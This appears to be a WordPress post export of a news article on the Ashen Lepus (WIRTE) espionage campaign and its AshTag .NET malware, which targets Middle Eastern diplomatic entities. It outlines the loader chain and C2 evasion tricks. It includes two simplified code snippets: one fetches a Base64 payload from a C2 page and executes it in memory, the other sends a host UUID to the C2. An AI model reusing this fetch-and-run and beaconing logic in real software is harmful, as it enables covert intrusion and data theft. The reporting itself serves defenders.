{"id":9151,"date":"2025-12-12T10:04:10","date_gmt":"2025-12-12T10:04:10","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/12\/12\/ashen-lepus-hacker-group-attacks-eastern-diplomatic-entities-with-new-ashtag-malware\/"},"modified":"2025-12-12T10:04:10","modified_gmt":"2025-12-12T10:04:10","slug":"ashen-lepus-hacker-group-attacks-eastern-diplomatic-entities-with-new-ashtag-malware","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/12\/12\/ashen-lepus-hacker-group-attacks-eastern-diplomatic-entities-with-new-ashtag-malware\/","title":{"rendered":"Ashen Lepus Hacker Group Attacks Eastern Diplomatic Entities With New AshTag Malware"},"content":{"rendered":"<p>    Ashen Lepus Hacker Group Attacks Eastern Diplomatic Entities With New AshTag Malware<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>A Hamas\u2011affiliated threat group known as Ashen Lepus, also tracked as WIRTE, has launched a new espionage campaign against governmental and diplomatic entities across the Middle East.<\/p>\n<p>The group uses realistic Arabic\u2011language diplomatic lures that reference regional politics and security talks to trick officials into opening weaponized documents.<\/p>\n<p>Once a target interacts with the lure, a multi\u2011stage chain quietly delivers a new custom <a href=\"https:\/\/cybersecuritynews.com\/chatgpt-powered-malware-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">malware<\/a> suite named AshTag, designed to steal sensitive diplomatic documents and maintain long\u2011term access to compromised systems.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh8lLOc2XxI11zHl7eyT8iF7EWgcpviIl-NM2iH5Yt6CnWA6ZLGR3tKgQj9pnCitFSoHAV5ltkbowsCkZyHtrJsnoPFEcsaavOtRDhzrtH_ciZ7egRJIGd4aGzcoG7FWmK7UsRoHJ1hCXtIkpuM2r0_bwxwflTcRaY2j4U2OtQ19Ql1UH-7R4GTvzdNmZQ\/s16000\/Lure%2520examples%2520presented%2520to%2520targets%2520%28Source%2520-%2520Palo%2520Alto%2520Networks%29.webp?ssl=1\" alt=\"Lure examples presented to targets (Source - Palo Alto Networks)\"><figcaption class=\"wp-element-caption\">Lure examples presented to targets (Source \u2013 Palo Alto Networks)<\/figcaption><\/figure>\n<\/div>\n<p>The operation has continued through recent regional conflicts and even after the October 2025 Gaza ceasefire, underlining the group\u2019s focus on persistent intelligence collection rather than short\u2011term disruption.<\/p>\n<p>The attackers rely on benign\u2011looking PDFs that direct victims to download RAR archives containing a fake document executable, a malicious loader, and an extra <a href=\"https:\/\/cybersecuritynews.com\/uac-0057-hackers-weaponizing-pdf\/\" target=\"_blank\" rel=\"noreferrer noopener\">decoy PDF<\/a>.<\/p>\n<p>When the victim runs what appears to be a document, Windows side\u2011loads a hidden malicious <a href=\"https:\/\/cybersecuritynews.com\/onedrive-exe-dll-sideloading-with-malicious-dll-files\/\" target=\"_blank\" rel=\"noreferrer noopener\">DLL<\/a> and begins the infection, while a harmless PDF opens on screen to reduce suspicion.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEifVofUyWaIsLgD3XQUfxsYzduJ4QsRVPeBpO7dDVreJbnW_0gxD2S6Z7tuoN7bXbqazluiWKuCqcz00L5ErN29aSm4cPBMYiPsmk6o_0SKV8e1rZkbGrhjnnENaztW7ZZsEPokqq5iTyrBSnLMTjs1NGBwGFXSreCydmo0ogayzJSZ8BZCdRK91RIfk2w\/s16000\/AshTag%27s%2520initial%2520infection%2520chain%2520%28Source%2520-%2520Palo%2520Alto%2520Networks%29.webp?ssl=1\" alt=\"AshTag's initial infection chain (Source - Palo Alto Networks)\"><figcaption class=\"wp-element-caption\">AshTag\u2019s initial infection chain (Source \u2013 Palo Alto Networks)<\/figcaption><\/figure>\n<\/div>\n<p>Palo Alto Networks security researchers <a href=\"https:\/\/unit42.paloaltonetworks.com\/hamas-affiliate-ashen-lepus-uses-new-malware-suite-ashtag\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> this new AshTag toolkit while tracking long\u2011running Ashen Lepus activity and noticed clear changes in both the malware and its command\u2011and\u2011control (C2) infrastructure.<\/p>\n<p>Instead of using dedicated attacker\u2011owned domains, the group now hides behind API\u2011style subdomains of legitimate\u2011looking sites, such as api.healthylifefeed[.]com and auth.onlinefieldtech[.]com, to make their traffic blend in with normal web activity.<\/p>\n<p>At the same time, payloads are executed in memory to leave fewer forensic traces on disk.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-ashtag-infection-mechanism-and-orchestrator-design\"><strong>AshTag Infection Mechanism and Orchestrator Design<\/strong><\/h2>\n<p>At the core of the campaign is a modular .NET backdoor, AshTag, which masquerades as a VisualServer utility but actually supports file exfiltration, command execution and in\u2011memory loading of extra tools.<\/p>\n<p>The chain moves from an initial loader dubbed AshenLoader, to a secondary stager called AshenStager, and finally to an orchestration component, AshenOrchestrator, which controls all later modules.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEilUdMWX38bz9qXmVP8mOubrJE7Q4jtROAwMT84QNG0wliYYeg-CNmBA3kgb9II_rLmLh24muqP8uiuDilwUFU_r5bjso3pFWAOwbTkkxy8wNYymaec1-M4xFhuYLTfVhVgZaSDCc3KKaNTlbj-mfZpjT1c5CCqbxfBHWOl-wZyYdCGHjzJRIi_ayMo1uw\/s16000\/The%2520full%2520AshTag%2520Malware%2520infection%2520chain%2520%28Source%2520-%2520Palo%2520Alto%2520Networks%29.webp?ssl=1\" alt=\"The full AshTag Malware infection chain (Source - Palo Alto Networks)\"><figcaption class=\"wp-element-caption\">The full AshTag Malware infection chain (Source \u2013 Palo Alto Networks)<\/figcaption><\/figure>\n<\/div>\n<p>AshenLoader sends basic host data to the C2 and fetches AshenStager from HTML content hidden between custom headerp tags.<\/p>\n<p>AshenStager then requests another page and extracts a Base64\u2011encoded payload buried inside article tags.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgeLIF1TXLzG6mN3YyNzaXsftjJgaNxO-GChH5nf4l9Ki3nnQv3IH8B7r-JSZqol8dTpJEgaPYNsaKvUyU3ezYLl6qRgBTbtNWtlmXZidSl1d3vWXb2t6nlVhwVEtTZ0aSPimPxIxtT6ODkxQsnpfz3ASxUxGKPFmozbDokThpMcBURkiPJYARqOglQVJ0\/s16000\/AshenOrchestrator%25E2%2580%2599s%2520Base64-encoded%2520payload%2520embedded%2520within%2520the%2520article%2520HTML%2520tags%2520%28Source%2520-%2520Palo%2520Alto%2520Networks%29.webp?ssl=1\" alt=\"AshenOrchestrator\u2019s Base64-encoded payload embedded within the article HTML tags (Source - Palo Alto Networks)\"><figcaption class=\"wp-element-caption\">AshenOrchestrator\u2019s Base64-encoded payload embedded within the article HTML tags (Source \u2013 Palo Alto Networks)<\/figcaption><\/figure>\n<\/div>\n<p>A simplified version of this parsing logic can be expressed as:-<\/p>\n<pre class=\"wp-block-code\"><code>var html = GetHtml(c2Url);\nvar match = Regex.Match(html, \"&lt;article[^&gt;]*&gt;(?&lt;data&gt;[^&lt;]+)&lt;\/article&gt;\");\nvar b64 = match.Groups[\"data\"].Value;\nvar payload = Convert.FromBase64String(b64);\nExecuteInMemory(payload);<\/code><\/pre>\n<p>AshenOrchestrator receives a Base64\u2011encoded <a href=\"https:\/\/cybersecuritynews.com\/aws-configuration-albeast-attack\/\" target=\"_blank\" rel=\"noreferrer noopener\">JSON configuration<\/a> that includes C2 domains, module URLs, encryption keys and jitter values mn and mx to randomize beacon timing.<\/p>\n<p>It first derives an AES key from tg and au parameters, then decrypts an XOR key used to decode the next embedded payload.<\/p>\n<p>That payload is another Base64\u2011encoded JSON object that defines the module\u2019s class name, such as SN for system fingerprinting or SCT for screen capture, and the loading method mna, which can direct the orchestrator to save a module to disk, execute it as a .NET assembly, upload extra content or inject code into memory.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhoHTn50AQIXXQREXMbJG-YErp_ptrpGFl-nH7AkaT3RvG_OdGzwSMBACvIMu2IgWrFRmojgkBuMM6cHt5jJ0cA53zF37fWb7PHDjWrNhTWj20qkufP7p5Fq_FD-6kg3xQSiJNeXa5yVmykXBDWfUjBaj1Co5jYiWHctZLsYacJSuuyrgS5xT_LSYvc4-k\/s16000\/Decoded%2520AshenOrchestrator%2520configuration%2520%28Source%2520-%2520Palo%2520Alto%2520Networks%29.webp?ssl=1\" alt=\"Decoded AshenOrchestrator configuration (Source - Palo Alto Networks)\"><figcaption class=\"wp-element-caption\">Decoded AshenOrchestrator configuration (Source \u2013 Palo Alto Networks)<\/figcaption><\/figure>\n<\/div>\n<p>One recovered module, SN, performs host profiling through simple <a href=\"https:\/\/cybersecuritynews.com\/lotus-blossom-apt-exploits-wmi\/\" target=\"_blank\" rel=\"noreferrer noopener\">WMI<\/a> queries and sends a unique victim ID back to the attackers, helping Ashen Lepus focus on high\u2011value diplomatic systems.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhjHVPu4pFUl7x-HCH1GIv7m45D6rYmX50z9UdvG41jb8Wdjsoltay4_i1JgmyOJaHc_rx1yRM6lvBpq-J1ti80gmfLz790w2G-FlhGvPTZVnuj12hZ7U2BSkyATKlL-AQ3tw7qsHUyjtz229u80ppW9TAQ8YmVnGZ19waFydRGHJul0ILmzqoPrELe_Q0\/s16000\/AshTag%2520module%2520decoding%2520process%2520%28Source%2520-%2520Palo%2520Alto%2520Networks%29.webp?ssl=1\" alt=\"AshTag module decoding process (Source - Palo Alto Networks)\"><figcaption class=\"wp-element-caption\">AshTag module decoding process (Source \u2013 Palo Alto Networks)<\/figcaption><\/figure>\n<\/div>\n<p>A basic version of this logic can be illustrated as:-<\/p>\n<pre class=\"wp-block-code\"><code>var id = GetWmi(\"Win32_ComputerSystemProduct\", \"UUID\");\nPostToC2(\"\/api\/v2\/register\", id);<\/code><\/pre>\n<p>This careful layering of loaders, HTML\u2011hidden payloads, and modular .NET components shows that Ashen Lepus is steadily improving its tradecraft while keeping the code base simple, flexible and tuned for stealthy diplomatic espionage.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 92%,rgb(169,184,195) 100%)\"><strong>Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0<strong>Set CSN as a Preferred Source in\u00a0<a href=\"https:\/\/www.google.com\/preferences\/source?q=cybersecuritynews.com\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google<\/a>.<\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/ashen-lepus-hacker-group\/\">Ashen Lepus Hacker Group Attacks Eastern Diplomatic Entities With New AshTag Malware<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/ashen-lepus-hacker-group\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ashen Lepus Hacker Group Attacks Eastern Diplomatic Entities With New AshTag Malware A Hamas\u2011affiliated threat group known as Ashen Lepus, also tracked as WIRTE, has launched a new espionage campaign against governmental and diplomatic entities across the Middle East. The group uses realistic Arabic\u2011language diplomatic lures that reference regional politics and security talks to trick [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-9151","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/9151"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=9151"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/9151\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=9151"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=9151"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=9151"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}